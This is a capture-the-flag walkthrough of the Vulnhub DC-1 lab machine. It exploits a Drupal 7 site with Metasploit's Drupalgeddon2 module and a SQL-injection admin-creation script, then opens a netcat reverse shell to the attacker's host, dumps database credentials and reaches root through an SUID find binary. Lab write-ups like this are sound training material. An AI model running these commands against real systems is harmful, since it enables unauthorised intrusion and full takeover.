Vulnhub - DC: 1
Here’s a walkthrough for the first VM in the DC Vulnhub series.
Enumeration
nmap
$ portscan 10.10.10.5
Open ports: 22,80,111,44029
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-11 15:21 EDT
Nmap scan report for devel.htb (10.10.10.5)
Host is up (0.00031s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
| ssh-hostkey:
| 1024 c4:d6:59:e6:77:4c:22:7a:96:16:60:67:8b:42:48:8f (DSA)
| 2048 11:82:fe:53:4e:dc:5b:32:7f:44:64:82:75:7d:d0:a0 (RSA)
|_ 256 3d:aa:98:5c:87:af:ea:84:b8:23:68:8d:b9:05:5f:d8 (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Debian))
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache/2.2.22 (Debian)
|_http-title: Welcome to Drupal Site | Drupal Site
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 43231/udp status
| 100024 1 44029/tcp status
| 100024 1 48642/tcp6 status
|_ 100024 1 58033/udp6 status
44029/tcp open status 1 (RPC #100024)
MAC Address: 08:00:27:17:ED:63 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.34 seconds
We find port 80 open running Drupal 7 with a robots.txt file.
HTTP
robots.txt
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites like Yahoo!
# and Google. By telling these "robots" where not to go on your site,
# you save bandwidth and server resources.
#
# This file will be ignored unless it is at the root of your host:
# Used: http://example.com/robots.txt
# Ignored: http://example.com/site/robots.txt
#
# For more information about the robots.txt standard, see:
# http://www.robotstxt.org/wc/robots.html
#
# For syntax checking, see:
# http://www.sxw.org.uk/computing/robots/check.html
User-agent: *
Crawl-delay: 10
# Directories
Disallow: /includes/
Disallow: /misc/
Disallow: /modules/
Disallow: /profiles/
Disallow: /scripts/
Disallow: /themes/
# Files
Disallow: /CHANGELOG.txt
Disallow: /cron.php
Disallow: /INSTALL.mysql.txt
Disallow: /INSTALL.pgsql.txt
Disallow: /INSTALL.sqlite.txt
Disallow: /install.php
Disallow: /INSTALL.txt
Disallow: /LICENSE.txt
Disallow: /MAINTAINERS.txt
Disallow: /update.php
Disallow: /UPGRADE.txt
Disallow: /xmlrpc.php
# Paths (clean URLs)
Disallow: /admin/
Disallow: /comment/reply/
Disallow: /filter/tips/
Disallow: /node/add/
Disallow: /search/
Disallow: /user/register/
Disallow: /user/password/
Disallow: /user/login/
Disallow: /user/logout/
# Paths (no clean URLs)
Disallow: /?q=admin/
Disallow: /?q=comment/reply/
Disallow: /?q=filter/tips/
Disallow: /?q=node/add/
Disallow: /?q=search/
Disallow: /?q=user/password/
Disallow: /?q=user/register/
Disallow: /?q=user/login/
Disallow: /?q=user/logout/
These locations are either denied by Drupal or Apache for not having permissions. Dirbuster doesn’t give us any more hints. Let’s see if we can find admin.
Login Form
Based on the fact we can request a new password for user:admin, that’s the account we are looking for. But, after 5 failed attempts at guessing the password, we are locked out. Brute-forcing is out of the question.
Sorry, there have been more than 5 failed login attempts for this account. It is temporarily blocked. Try again later or request a new password.
Metasploit
Let’s check for exploits.
root@kali:~/Security/Vulnhub/DC-Series/1# searchsploit Drupal 7
---------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
---------------------------------------------------------------------------- ----------------------------------------
Drupal 4.7 - 'Attachment mod_mime' Remote Command Execution | exploits/php/webapps/1821.php
Drupal 4.x - URL-Encoded Input HTML Injection | exploits/php/webapps/27020.txt
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Add Admin User) | exploits/php/webapps/34992.py
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Admin Session) | exploits/php/webapps/44355.php
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (1) | exploits/php/webapps/34984.py
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (2) | exploits/php/webapps/34993.php
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Remote Code Execution) | exploits/php/webapps/35150.php
Drupal 7.12 - Multiple Vulnerabilities | exploits/php/webapps/18564.txt
Drupal 7.x Module Services - Remote Code Execution | exploits/php/webapps/41564.php
Drupal < 4.7.6 - Post Comments Remote Command Execution | exploits/php/webapps/3313.pl
Drupal < 5.22/6.16 - Multiple Vulnerabilities | exploits/php/webapps/33706.txt
Drupal < 7.34 - Denial of Service | exploits/php/dos/35415.txt
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code (Metasploit) | exploits/php/webapps/44557.rb
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code Execution (PoC) | exploits/php/webapps/44542.txt
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code E | exploits/php/webapps/44449.rb
Drupal Module CKEditor < 4.1WYSIWYG (Drupal 6.x/7.x) - Persistent Cross-Sit | exploits/php/webapps/25493.txt
Drupal Module Coder < 7.x-1.3/7.x-2.6 - Remote Code Execution | exploits/php/remote/40144.php
Drupal Module Cumulus 5.x-1.1/6.x-1.4 - 'tagcloud' Cross-Site Scripting | exploits/php/webapps/35397.txt
Drupal Module Drag & Drop Gallery 6.x-1.5 - 'upload.php' Arbitrary File Upl | exploits/php/webapps/37453.php
Drupal Module Embedded Media Field/Media 6.x : Video Flotsam/Media: Audio F | exploits/php/webapps/35072.txt
Drupal Module RESTWS 7.x - PHP Remote Code Execution (Metasploit) | exploits/php/remote/40130.rb
Drupal avatar_uploader v7.x-1.0-beta8 - Arbitrary File Disclosure | exploits/php/webapps/44501.txt
---------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
We have lots to choose from, but Drupalgeddon looks very promising. Let’s check Metasploit for an easy win.
msf5 > search drupalgeddon
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/webapp/drupal_drupalgeddon2 2018-03-28 excellent Yes Drupal Drupalgeddon 2 Forms API Property Injection
msf5 > use exploit/unix/webapp/drupal_drupalgeddon2
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > options
Module options (exploit/unix/webapp/drupal_drupalgeddon2):
Name Current Setting Required Description
---- --------------- -------- -----------
DUMP_OUTPUT false no Dump payload command output
PHP_FUNC passthru yes PHP function to execute
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Path to Drupal install
VHOST no HTTP server virtual host
Exploit target:
Id Name
-- ----
0 Automatic (PHP In-Memory)
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set RHOSTS 10.10.10.5
RHOSTS => 10.10.10.5
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > exploit
[*] Started reverse TCP handler on 10.10.10.6:4444
[*] Sending stage (38288 bytes) to 10.10.10.5
[*] Meterpreter session 1 opened (10.10.10.6:4444 -> 10.10.10.5:52137) at 2020-08-11 16:00:57 -0400
meterpreter > getuid
Server username: www-data (33)
meterpreter > pwd
/var/www
Okay well that’s neat, but let’s try to learn something. Back to the searchsploit output, let’s add an admin user.
root@kali:~/Security/Vulnhub/DC-Series/1# cp /usr/share/exploitdb/exploits/php/webapps/34992.py ./34992.py
root@kali:~/Security/Vulnhub/DC-Series/1# python 34992.py
...
Usage: 34992.py -t http[s]://TARGET_URL -u USER -p PASS
...
root@kali:~/Security/Vulnhub/DC-Series/1# python 34992.py -t http://10.10.10.5 -u me -p pass
______ __ _______ _______ _____
| _ \ .----.--.--.-----.---.-| | | _ || _ | _ |
|. | \| _| | | _ | _ | | |___| _|___| |.| |
|. | |__| |_____| __|___._|__| / |___(__ `-|. |
|: 1 / |__| | | |: 1 | |: |
|::.. . / | | |::.. . | |::.|
`------' `---' `-------' `---'
_______ __ ___ __ __ __
| _ .-----| | | .-----|__.-----.----| |_|__.-----.-----.
| 1___| _ | | |. | | | -__| __| _| | _ | |
|____ |__ |__| |. |__|__| |_____|____|____|__|_____|__|__|
|: 1 | |__| |: | |___|
|::.. . | |::.|
`-------' `---'
Drup4l => 7.0 <= 7.31 Sql-1nj3ct10n
Admin 4cc0unt cr3at0r
Discovered by:
Stefan Horst
(CVE-2014-3704)
Written by:
Claudio Viviani
http://www.homelab.it
info@homelab.it
homelabit@protonmail.ch
https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
[!] VULNERABLE!
[!] Administrator user created!
[*] Login: me
[*] Pass: pass
[*] Url: http://10.10.10.5/?q=node&destination=node
Neat. As admin, we can install the Drupal Shell module and open a reverse shell.
Gaining Access
Attacker:
$ nc -lvp 1234
Drupal shell:
$ nc -nv 10.10.10.6 1234 -e /bin/bash
Now, with a shell we find flag1.txt in the base directory.
whoami
www-data
pwd
/var/www
ls | grep flag
flag1.txt
cat flag1.txt
Every good CMS needs a config file - and so do you.
Let’s check Drupal’s config files, but in a lazy/efficient way.
grep -rnw . -e 'flag2'
./sites/default/settings.php:5: * flag2
Let’s check that file.
cat settings.php
<?php
/**
*
* flag2
* Brute force and dictionary attacks aren't the
* only ways to gain access (and you WILL need access).
* What can you do with these credentials?
*
*/
$databases = array (
'default' =>
array (
'default' =>
array (
'database' => 'drupaldb',
'username' => 'dbuser',
'password' => 'R0ck3t',
'host' => 'localhost',
'port' => '',
'driver' => 'mysql',
'prefix' => '',
),
),
);
...
Great, we found some DB credentials, dbuser:R0ck3t. Here’s how to log into a mysql db:
shell> mysql --user=user_name --password db_name
Enter password: your_password
For some reason mysql isn’t working even with supposedly accurate credentials. I assume the expected path is to grab the hashed admin password from the DB, crack it, and then log in. Since we already have an admin account, let’s go back to that. Turns out in the Content tab, there is an unpublished post called flag3 which contains the text:
Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow.
Privilege Escalation
Quite the hint! Checking the find command with ls -l /usr/bin/fin, it has root privileges and SUID bit set. Running find . -exec /bin/sh \; we get root. Let’s make a quick stop in the /home directory to see if there are any users before grabbing the root flag, most likely in the /root directory. We find flag4 in /home/flag4/flag4.txt containing the following text:
Can you use this same method to find or access the flag in root?
Probably. But perhaps it's not that easy. Or maybe it is?
At this point, it’s that easy.
cat /root/thefinalflag.txt
Well done!!!!
Hopefully you've enjoyed this and learned some new skills.
You can let me know what you thought of this little journey
by contacting me via Twitter - @DCAU7